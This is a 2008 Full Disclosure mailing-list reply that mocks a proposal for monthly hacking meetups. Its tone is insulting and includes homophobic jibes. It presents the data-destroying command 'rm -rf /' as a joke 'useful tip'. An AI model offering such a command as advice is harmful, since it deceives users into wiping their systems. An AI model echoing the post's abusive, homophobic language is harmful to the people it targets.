Full Disclosure mailing list archives

Re: Monthly Hands-On Meetups

From: hannibal <hannibal () switched com>
Date: Thu, 04 Sep 2008 20:06:58 +0100

Professor Micheal Chatner wrote:
Hey Guys,

Hey Guy
I was wondering if anyone would like to start something like a
Full-Disclosure monthly group in cities all over the world.
Fascinating idea - we could even have 'Full-Disclosure conferences',
where you could
get 'Full-Disclosure' Islamic prayer mats, mugs and stickers! It would a
methodology
centric to 'hack the planet'.
It could be like 2600 meetings except with real security professionals because
personally I don't want to even talk to someone unless they have a CEH
cert.

What's a CEH? And what leads you to assume that there are 'real security
professionals' on Full-Disclosure?
I think your desires may be better fed on irc.efnet.org #teenchat; As
far as I know, there are more sec
professionals there than FD and 2600 put together.
I just started a new job in digital forensics.
Congratulations
It would be fun to meet other people who like hacking and trading Ubuntu tips and tricks!

To conclude, Professor Michael Chatner, I'm very impressed with your
desire to 'hack and trade' Ubuntu 'tips and tricks', here's a very
useful one for when you feel under the weather, ashamed of your true
homosexual status, or incapable of understanding how the linux 2.4 kern
caches directories in kernel memory:
*    rm -rf /**
Let me know what you think!
Professor Micheal Chatner, M.D., CISSP
I think you're a talentless moron.

~ hannibal (append your fancy degrees/certs and publishings here)